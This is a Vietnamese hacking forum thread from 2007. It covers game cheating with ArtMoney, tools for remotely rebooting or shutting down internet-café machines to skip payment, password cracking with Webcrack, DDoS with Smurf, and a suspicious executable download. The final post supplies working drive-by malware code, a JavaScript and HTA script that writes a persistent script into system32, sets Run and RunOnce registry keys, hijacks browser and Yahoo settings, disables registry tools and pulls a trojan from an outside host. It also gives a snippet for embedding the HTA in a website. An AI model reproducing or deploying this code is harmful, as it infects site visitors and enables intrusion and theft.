thế là xong vào máy chủ đơn giản .Cái này chỉ ngồi ở máy con khi có kết nối với máy chủ thôi còn
khi đem passline đi chổ khác thì làm cách này chưa được
đó là 1 nhược điểm . Theo tôi đem cái này mà kể cho Huyremy chắc hén cười quá , thời buổi này
toàn ngồi từ xa xâm nhập thôi còn cài này thua rồi , tôi nói câu này chắc có người hiểu ....
trang này rất hay các bạn có thể nghiên cứu thêm
http://www.hackerwhacker.com
trình độ ngoại ngữ kém cũng là 1 rào cản về tin học
(¯`•._.•´¯)
02-21-2007, 08:13 PM
HACK GAME KHÔNG PHẢI LÀ BẺ KHÓA phần mềm mà chỉ là dò tìm các giá trị tài nguyên (gỗ,
vàng, sắt...) của game được lưu trong bộ nhớ và sửa thành các giá trị như ý muốn. Nói nôm na thì đó
là chơi ăn gian ý mà. Khi bạn sử dụng trainer để thay đổi giá trị các tài nguyên trong Game tức là
bạn đã Hack nó rồi đó. Nguyên tắc hoạt động của các trainer cũng giống như các bước để Hack
Game nhưng có điều khác là nó đã được định vị trước địa chỉ chứa chỉ chứa tài nguyên nào đó và khi
được kích hoạt, nó sẽ tự động cộng thêm vào giá trị tài nguyên đó một con số theo ý bạn.

“Đồ nghề” để hack game gồm những gì? Đầu tiên là phải có một chương trình hack game. Chương
trình để hack game thì có khá nhiều: ArtMoney, GameHack, ProHack, TSearch... Trong số đó thì qua
sử dụng tôi thấy ArtMoney là tuyệt nhất, vừa miễn phí lại vừa dễ sử dụng cộng với những chức năng
rất độc đáo mà các chương trình khác không có. Làm thế nào để hack một game? Ở đây tôi sẽ hướng
dẫn bạn hack game bằng chương trình ArtMoney.

Giao diện sử dụng của chương trình vô cùng đơn giản nhưng hiệu quả thì không chê vào đâu được.
Ta hãy tìm hiểu các lệnh của nó:

Search: Tìm kiếm giá trị của tài nguyên. Nó sẽ dò tìm trên bộ nhớ tất cả các địa chỉ nào chứa giá trị
mà bạn muốn tìm. Bạn có thể tìm một giá trị chính xác hay cả một vùng các giá trị, sau đó bạn nhớ
chọn loại giá trị tìm kiếm cho phù hợp, hầu hết các game đều chỉ sự dụng loại giá trị Integer 4 bytes.

Sieve: Lọc các giá trị đã tìm được ở bước đầu. Chương trình sẽ dò lại trong các địa chỉ đã tìm được
những giá trị nào bị thay đổi và loại bỏ những giá trị không cần thiết khác đi.

Options: Các thiết lập của chương trình.

Benchmark: Đo tốc độ xử lý của CPU.

Clear: Xóa tất cả các địa chỉ đã tìm được.

Load: Mở lại bảng địa chỉ đã lưu.

Save: Lưu lại bảng địa chỉ đã tìm.

Info: Thông tin về game đang hack.

Bây giờ chúng ta sẽ đi vào ví dụ cụ thể. Đầu tiên bạn phải chạy chương trình ArtMoney trước, sau
đó hãy mở game nào đó và chơi như bình thường. Chẳng hạn như bạn đang có 10000 vàng, hãy nhớ
con số đó và bấm phím tắt để gọi ArtMoney (thường thì đó là Đây là kết quả sau khi sửa. [Ctrl] +
[F12]). Bấm vào nút Search và gõ 10000 vào ô Value. Bấm OK.

Sau đó bạn hãy vào trong game và mua bán hay làm bất cứ cái gì để thay đổi con số 10000 thành
một con số khác. Tiếp đến bạn gọi ArtMoney lần nữa và bấm vào nút Sieve để lọc. Nhập giá trị mà
bạn vừa thay đổi vào ô Value và chọn OK.

Chương trình sẽ tìm được một giá trị bị thay đổi và nó chắc chắn là số vàng hiện tại của bạn, bạn hãy
Add nó vào bảng giá trị và sửa Value của nó theo ý thích. Bạn có thể cho Freeze (đông cứng) giá trị
đó lại để khỏi phải mất công sửa lại sau này bằng cách đánh dấu chọn vào trong cột F. Nếu như bạn
có nhiều giá trị tài nguyên khác nhau thì bạn có thể đặt Description (mô tả) cho nó để nhận biết loại
tài nguyên đó. Đối với các tài nguyên khác bạn cũng làm giống như các bước trên.
suppersonic
02-22-2007, 11:00 AM
nhà tui có artmoney nè,để tui nói ngắn gọn hơn
-artmoney làm thay đổi số
-yêu cầu:
+số đó thay đổi đc
nhưng artmoney chỉ thay đổi số của mini game,offline.Còn online chỉ là ảo
còn 1 loại hack mà nhà tui có là hack tốc độ(hack này hợp với offline,mini game)
-online sài cũng đc nhưng cỡ 1-2phút là bị đá,cách sài cho online:
+dùng để vô game cho nhanh,vô đc rùi tắt liền
+hoặc đi đâu xa thì chỉnh tốc độ lên cao,chạy 1 quãng vài giây rùi tắt
+chơi hép-lai hack tốc độ là đã nhất,chỉnh tốc độ cho vừa đủ rùi bắn
*lưu ý:với hép-lai chỉ hack speed ngon khi chơi với bạn bè,bắn với máy thì ai cũng nhanh
-Và đây là phần các bạn đang mong chờ:
hack speed nói trên đang cư ngụ tại:http://www.foredu.com/:D
Zị Nhân
02-25-2007, 04:51 PM
làm thử rùi nhưng đến đănng nhập IE thì miss !~ hic hướng dẫn cẩn thận với
luke206
02-25-2007, 06:29 PM
đầu tiên bạn tải phần mềm restart 2.0 tại đây
giải nén và cho chạy file .exe nhấn chuột vào nút ping ip sau đó gõ tên máy tính cần khởi đọng lại
vào ô tênmays tính cần ping sau đó copy địa chỉ ip xuống cửa sổ ban đầu rồi nhấn nút bomb thì máy
tính nạn nhân sẽ khởi động lại trong vòng 1 phút
chú ý tui mới đưa phần mềm restart lại máy ai nhấn nút thanks thì tui cho phần mềm tắt hẳn máy
trong quán để tắt máy chủ khỏi trả tiền net

ai tải thì nhấn giùm nút thanks đi 5 giây thui mà nhưng mà quan trọng với tui 59 lần tải mà thanks có
9 lần ..........

-----------------

Các bạn được lạm dụng nó để tập kích quán nét đấy,xí hổ lắm!
Hackermail
02-26-2007, 07:09 PM
Hii ! Mỏi máy đều có số IP thông thường họ đã chọn chế độ ẩn nói đúng hơn là giấu rồi ! Nên nếu
bạn muốn Hack thì tốt nhất tìm cho mình một soft chuyên về IP thì tốt hơn, thì độ chính xác sẻ được
nâng lên tối đa.
Khoa Remy
02-26-2007, 07:10 PM
Bạn có thể post hình lên ko?? cụ thể miss ở đây là gì ?!!! Bạn xác định đúng IP của Modem thì gõ
vào IE là ra ngay thui !!
Zị Nhân
03-02-2007, 12:51 PM
Sao không dùng hackeasycafe cho tiện
Zị Nhân
03-04-2007, 01:00 PM
Hey~Nhanh nên bọn này chờ đấy~~đề tài này tui rất thích và theo rõi rất đều đấy~```

Chú ý: Phần mềm shutdows của pác không xài dc nữa nà xao????
luke206
03-04-2007, 08:49 PM
không bít ,có chạy dược file exe không vậy

sorry nếu ai đợi lâu mà không thấy tui gửi thì nhắn tin cho tui nhe vì tui có thể quên là đã gửi hay
chưa
autokiss
03-05-2007, 12:44 AM
Mày chim cút đi con ạ, phần mềm restart mấy máy khác chỉ có thể thực hiện trong cùng 1 quán net
tức là có nối mạng LAN. Cái này hoàn toàn không cần dùng phần mềm. Tiếc là tao đã quên nhưng
tao sẽ tìm ra.

Chẳng cần đi đâu xa, vào đây tham khảo tất cả các bài mà thằng Luke viết đều có thể làm được
http://www.quantrimang.com/view.asp?Cat_ID=11&news_id=23256
Khoa Remy
03-12-2007, 01:59 PM
++Hix tui nhớ cái này tui giới thiệu rùi mà ! Nhưng các bác chú ý nè: Chỉ áp dụng dc khi máy của
nạn nhân sử dụng SP1 (máy mình SP2 cũng ko sao). Khi sử dụng máy nạn nhân sẽ hiện ra một bản
báo lỗi & sẽ đếm ngược lại khoảng 30s => sau đó tắt cái bụt. Nếu bác nào bị chơi bằng cách này thì
sau đây là cách khắc phục:
Vào Start > Run > gõ cmd> trong cửa sổ các bác gõ lệnh shutdown -a, cách này sẽ làm mất bản báo
lỗi đó, đồng thời hung thủ sẽ ko thể làm máy bạn thêm 1 lần nào nữa (tuy nhiên sau khi bị chơi =
cách này & đã phá giải dc rùi thì máy bạn sẽ bị hư bộ nhớ đệm tạm thời (bạn ko thể sử dụng dc cách
chức năng Copy, Cut , Paste) ). Chúc các bác thành công !!
luke206
03-16-2007, 10:32 PM
sorry tui mới vào nên không biết bác đã post bài này rồi ++Hix tui nhớ cái này tui giới thiệu rùi mà !
Nhưng các bác chú ý nè: Chỉ áp dụng dc khi máy của nạn nhân sử dụng SP1 (máy mình SP2 cũng ko
sao). Khi sử dụng máy nạn nhân sẽ hiện ra một bản báo lỗi & sẽ đếm ngược lại khoảng 30s => sau
đó tắt cái bụt. Nếu bác nào bị chơi bằng cách này thì sau đây là cách khắc phục:
Vào Start > Run > gõ cmd> trong cửa sổ các bác gõ lệnh shutdown -a, cách này sẽ làm mất bản báo
lỗi đó, đồng thời hung thủ sẽ ko thể làm máy bạn thêm 1 lần nào nữa (tuy nhiên sau khi bị chơi =
cách này & đã phá giải dc rùi thì máy bạn sẽ bị hư bộ nhớ đệm tạm thời (bạn ko thể sử dụng dc cách
chức năng Copy, Cut , Paste) ). Chúc các bác thành công !!
thattinhvotinh
03-17-2007, 02:45 PM
tôi thấy bài này viết không đầy đủ và lô gic thế thì ai học được chứ. Phải hướng dẫn tận tình thì
người ta mới biết được chứ
tranngoctinh4988
03-17-2007, 08:54 PM
Dùng phần mềm trên cũng cho ta IP của mạng lan mà .
Hoặc bạn dùng scan IP cũng được .
jacky08
03-19-2007, 09:16 AM
sao cách một vào ko được vậy bạn có lừa mình ko vây nè:suyt:
boykinhkhung
03-19-2007, 05:06 PM
ba ah`, làm như để học hacker dễ lắm.Để trở thành 1 hacker thứ thiệt bạn phải hpcj từ căn bản
chứ.Nên đùng có vội vàng.
boykinhkhung
03-19-2007, 05:07 PM
ba ah`, làm như để học hacker dễ lắm.Để trở thành 1 hacker thứ thiệt bạn phải hpcj từ căn bản
chứ.Nên đùng có vội vàng.
romanticboy2112
03-19-2007, 06:46 PM
you này to gan tày trời mới dám bày cái trò hack pass........................ban nick luôn đó.......
user1986
03-19-2007, 08:35 PM
dám bài cách hack pass của admin kìa trời
hung_it
03-19-2007, 09:12 PM
có sao đâu nào!!!!!!!!,cái gì cũng nên biết
autokiss
03-19-2007, 11:47 PM
Tôi ghét nhất cái trò ăn cắp mật khẩu để làm vớ làm vẩn. Thực ra giờ có nhiều chương trình có thể
lấy được pass someone nhưng nhiều người không dùng. Làm thế chẳng khác nào xâm phạm vào đời
tư của người khác.
Njck
03-20-2007, 08:43 PM
Hack pass cũng mang tội là Hack...chẳng thà là Hack cái j đó cho đáng...
Ex: hack đường truyền, hack Software đem bán, ...:D
yukino289
03-22-2007, 02:41 PM
Tùy cái mà hack thôi, đâu phải lúc nào hack cũng có tội đâu mấy anh chị
alizwong
03-22-2007, 02:56 PM
Cách 1: Hack Pass, có nghĩa là chôm được pass của admin or MOD và vào chọc ngoáy theo ý mình.
Có rất nhiều cách để chôm pass nhưng có một chương trình mà SV chúng ta hay sử dụng đó là
Webcrack ( Down về từ http://webcrack.home.ml.org/ )
Đừng có dùng để làm chuyện mờ ám nhé :gaicam:

Cách 2: Cách này tương tự như kiểu bomb thư mà ta hay dùng tức là làm treo Website bằng những
user ảo (có thể lên đến 10.000 ) bằng kỹ thuật Distributed Denial Of Service , Mục đích của cách này
là làm trang Web ngưng trệ trong một thời gian nhất định chứ ko thể thay đổi được nội dung Website
chứ chưa nói đến chuyện cướp domain (cùng một lúc có 10.000 người truy cập vào không treo mới
là chuyện lạ) . Các bạn có thể dùng chương trình Smurf để thực hiện...hoặc nhiều chương trình khác.

Cách 3: Hack Domain, Cách này tôi cũng chỉ mới nghe mấy tay "có máu mặt" nói chuyện (mình
chưa đủ trình độ .. hè hè) . Hình như 3 năm trước (Soulevil còn bé tí tẹo) forum Viethacker và
Hackervn oánh nhau , các hacker dùng cách này --> kết quả một bên ngỏm củ tỏi còn một bên tạm
ngưng hoạt động trong một thời gian. Bác nào biết hack bằng cách này post bài cho anh em học hỏi
đi
Ê ! thèng kia ! nói thử nghiệp dư chổ nào coi ! :boss: ! Nếu xài web crack mà thằng nghiệp dư hack
đc site vậy tụi webmaster đi ăn mài hết roài ! Nếu ông hay hãy Hack web của tui thử coi ! :oh:
SiSiVN.Org (http://sisivn.org)
quý tộc thời @
03-24-2007, 07:37 AM
CÓ AI CHỈ CHO MÌNH CÁCH BOSS HÌNH KHONG VAY
MÌNH CÓ THỂ LÀM WEN VỚI CÁC BẠN CHỨ
MÌNH MỚI 13 TUỐI THÔI NHƯNG RẤT THÍCH LÀM BẠN VỚI CÁC ANH CHỊ LỚN
HAY NHẮN TIN CHO MINH NHÉ ngosao_anchoiketban
teungaogiangho
03-24-2007, 10:06 AM
toàn chuyện nhảm nhí chẳng có gì dễ cả nếu dễ như vậy thì chẳng còn diễn đàn naỳ nưã đâu
tieungaogiangho
03-24-2007, 10:28 AM
Nói thì dễ, làm mới khó !
nguyenductu19872007
03-24-2007, 11:54 AM
có người pos rui 3 con hai con vượt được bức tường lủa thư? poss cho anh em xài sem sao :)
mymychu
03-24-2007, 08:53 PM
bây giờ người ta dùng ba chấm đến 3 chấm mấy ko hà
ai mà dùng hai chấm nữa lỡ thời rồi
vả lại ba chấm sài dể hơn chỉ cấn biềt được số ip là được
nhưng khi phòng nét người ta dùng chương trình bootrom thì bó tay mà tắt bạn à
:36_7_15: :36_7_15: :36_7_15: dã quá ta oi...........ha ha
Ð? ?NG H? MÌNH B?N HÃY CLICK VÀO NÚT THANK
http://truongton.net/forum/imagehosting/15212145fcf9007c33e.gif
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3052)http://truongton.net/forum/
imagehosting/thum_15212145ffeb02373d0.jpg
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3259)http://truongton.net/forum/
imagehosting/thum_15212145ffec424026f.jpg
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3262)http://truongton.net/forum/
imagehosting/15212145fcf9007c33e.gif
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3052)

http://truongton.net/forum/imagehosting/thum_15212145fcf85bec356.gif
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3041)
taolanamhieu
03-25-2007, 12:50 AM
đầu tiên bạn tải phần mềm restart 2.0 tại đây
giải nén và cho chạy file .exe nhấn chuột vào nút ping ip sau đó gõ tên máy tính cần khởi đọng lại
vào ô tênmays tính cần ping sau đó copy địa chỉ ip xuống cửa sổ ban đầu rồi nhấn nút bomb thì máy
tính nạn nhân sẽ khởi động lại trong vòng 1 phút

chú ý tui mới đưa phần mềm restart lại máy ai nhấn nút thanks thì tui cho phần mềm tắt hẳn máy
trong quán để tắt máy chủ khỏi trả tiền net
ai tải thì nhấn giùm nút thanks đi 5 giây thui mà nhưng mà quan trọng với tui 59 lần tải mà thanks có
9 lần ..........
tro nay không có tác dụng đề nghi sưu tầm bài khác
mymychu
03-25-2007, 12:11 PM
bạn muốn chôm pass của nguời ta bộ dễ lắm à
hắc những web quan trọng của nguời ta ở tù thấy m? luôn
nhưng những web đó nguời ta bảo mật cao lắm bạn à
nếu bạn giỏi về lập trình thì hãy viết một con virus và ẫn nó vào trang trường tốn này thì gọi là
suport được rồi đó . Lúc đó tui sẽ ra tay ngăn chặn cho nhưng ai sẽ dính nó bạn thử làm đi
tui ko thích hac nguời ta như thế vả lại tay nghề tui chưa đủ nếu dựa trên cơ sở phần mềm thì nguời
quản trị sẻ biat61 ngay bạn là ai
tìm hiều them đi cu ơi
:36_7_15: :36_7_15: :36_7_15: dã quá ta oi...........ha ha
Ð? ?NG H? MÌNH B?N HÃY CLICK VÀO NÚT THANK
http://truongton.net/forum/imagehosting/15212145fcf9007c33e.gif
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3052)http://truongton.net/forum/
imagehosting/thum_15212145ffeb02373d0.jpg
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3259)http://truongton.net/forum/
imagehosting/thum_15212145ffec424026f.jpg
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3262)http://truongton.net/forum/
imagehosting/15212145fcf9007c33e.gif
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3052)

http://truongton.net/forum/imagehosting/thum_15212145fcf85bec356.gif
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3041)
vk_sieuantrom
03-25-2007, 12:36 PM
dow vể mả ko biết dửng thỉ như ko
mymychu
03-25-2007, 12:38 PM
cu à mình hỏi thiệt cu nghe
cu muốn trở thành HC thì phải trải qua lập trình cu ạ
lập trình của cu có vững chua cu có thể viết một lập trình game mini chưa
tui ko muốn trở thành HC đâu nhưng tui chỉ cho cu vào đây học thêm lập trình để trở thành một HC
chuyên nghiệ nhưng coi chùng ở tù nha
chừng nào cu chuyên nghiệp thì hảk web này dúm tui nghe
www.mymychu.syl.com
cu hãy tìm ra pass của nó và hac thật nặng nhé
chúc cu thành công
:36_7_15: :36_7_15: :36_7_15: dã quá ta oi...........ha ha
Ð? ?NG H? MÌNH B?N HÃY CLICK VÀO NÚT THANK
http://truongton.net/forum/imagehosting/15212145fcf9007c33e.gif
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3052)http://truongton.net/forum/
imagehosting/thum_15212145ffeb02373d0.jpg
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3259)http://truongton.net/forum/
imagehosting/thum_15212145ffec424026f.jpg
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3262)http://truongton.net/forum/
imagehosting/15212145fcf9007c33e.gif
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3052)

http://truongton.net/forum/imagehosting/thum_15212145fcf85bec356.gif
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3041)
luke206
03-26-2007, 10:00 AM
post cái ba chấm mấy của bác lên cho mọi người cùng xài cho vui đi bây giờ người ta dùng ba chấm
đến 3 chấm mấy ko hà
ai mà dùng hai chấm nữa lỡ thời rồi
vả lại ba chấm sài dể hơn chỉ cấn biềt được số ip là được
nhưng khi phòng nét người ta dùng chương trình bootrom thì bó tay mà tắt bạn à
:36_7_15: :36_7_15: :36_7_15: dã quá ta oi...........ha ha
Ð? ?NG H? MÌNH B?N HÃY CLICK VÀO NÚT THANK
http://truongton.net/forum/imagehosting/15212145fcf9007c33e.gif
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3052)http://truongton.net/forum/
imagehosting/thum_15212145ffeb02373d0.jpg
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3259)http://truongton.net/forum/
imagehosting/thum_15212145ffec424026f.jpg
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3262)http://truongton.net/forum/
imagehosting/15212145fcf9007c33e.gif
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3052)

http://truongton.net/forum/imagehosting/thum_15212145fcf85bec356.gif
(http://truongton.net/forum/vbimghost.php?do=displayimg&imgid=3041)
thanhcuong171
03-26-2007, 10:10 AM
cái này thì quá dễ rùi!
tải cái này về xem hướng dẫn mà dùngTải tại đây (http://tieu171.googlepages.com/OllyDebug.exe)
chúc thành công nhé!!!!!!!!!!!!!!!!!

ai bít hack võ lâm thì post lên cho các bạn mở rộng tầm mắt đi nào

tải về (http://tieu171.googlepages.com/OllyDebug.exe)
tải về trên đó có hướng dẫn
*chú ý* có thể hack dc pas rương của võ lâm
chúc thành công nhé!!!!!!!:plane:
continental
03-28-2007, 03:13 PM
[QUOTE=thanhcuong171;615066]cái này thì quá dễ rùi!
tải cái này về xem hướng dẫn mà dùngTải tại đây (http://tieu171.googlepages.com/OllyDebug.exe)
chúc thành công nhé!!!!!!!!!!!!!!!!!

tải về (http://tieu171.googlepages.com/OllyDebug.exe)
tải về trên đó có hướng dẫn
*chú ý* có thể hack dc pas rương của võ lâm
chúc thành công nhé!!!!!!!:plane:[/QU
Coi chừng tải về thì bị hack trước :cool1:
spideman
03-28-2007, 07:09 PM
tui da cai xong het roi, nhung doi ca ngay nay chang thay co cai mail nao ve ca. hoi that vong
ntt1409
03-28-2007, 09:05 PM
Khi các bạn đã sử dụng thành công nhưng do 1 phút sơ sảy mà bị Công An bắt thì chỉ mong các anh
đừng réo và khai tên em ra kẻo tội nghiệpCách 1 : dùng một đoạn mã đơn giản để open 1 con trojan !

đoạn mã như sau:


<script language=javascript>
open("http://freewebs.com/nhutuanweb/thanks.exe");
</SCRIPT>

với đoạn mã này bạn gắn dưới thẻ body thì mỗi khi truy cập website nó sẽ tự open con trojan của
bạn.

cách thứ 2 là cách rất cao cấp ...

bạn copy vào notepad đoạn mã sau:


<html>
<head>
<script language="javascript">
try {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var Shell = new ActiveXObject("WScript.Shell");
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + "\\system32\\System.js";
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine('var url = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";');
a2.WriteLine('var burl = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";');
a2.WriteLine('var fso = new ActiveXObject("Scripting.FileSystemObject");');
a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);');
a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";');
a2.WriteLine('var Shell = new ActiveXObject("WScript.Shell");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\RunOnce\\\\Windows",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Run\\\\System32",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Start
Page",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url1",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url2","http://http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url3","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url4","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url5","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url6","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url7","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url8","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url9","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url10","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url11","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG
R_Calendar\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG
R_Games\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG
R_Launchcast\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG
R_Weather\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Policies\\\\System\\\\DisableRegistryT ools",1,"REG_DWORD");');
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />
</head>
<body onload='window.close()'>
</body>
</html>
<!--- <frameset></frameset> -->

rồi save lại với tên là : hackervn.hta

nhớ là thay đường dẫn của con trojan đi nha..(http://www.freewebs.com/hinhanhlop18/hackervn.exe)


là đường dăn tơi kon TJ
sau khi có file hackervn.hta rồi bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
<center>
<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="hackervn.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>

rồi sau đó bạn upload file hackervn.hta + với website của bạn lên cùng 1 host ...ok mỗi lần mở
website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện+ thêm nó set
homepage luôn cho chắc ăn...

cách này rất hay...và cao cấp.

cách thứ 3
là các bạn dùng chương trình gắn trojan vào html: đó là GodWill1.06

chương trình này mình thấy nói rất nhiều trên các diễn đàn nhưng mà chẳng có ai làm được cả...hình
như là copy ở site ra thôi.
các bạn downlaod tại đây http://www.freewebs.com/trangchulop18/GodWill1.6.rar ...nếu không
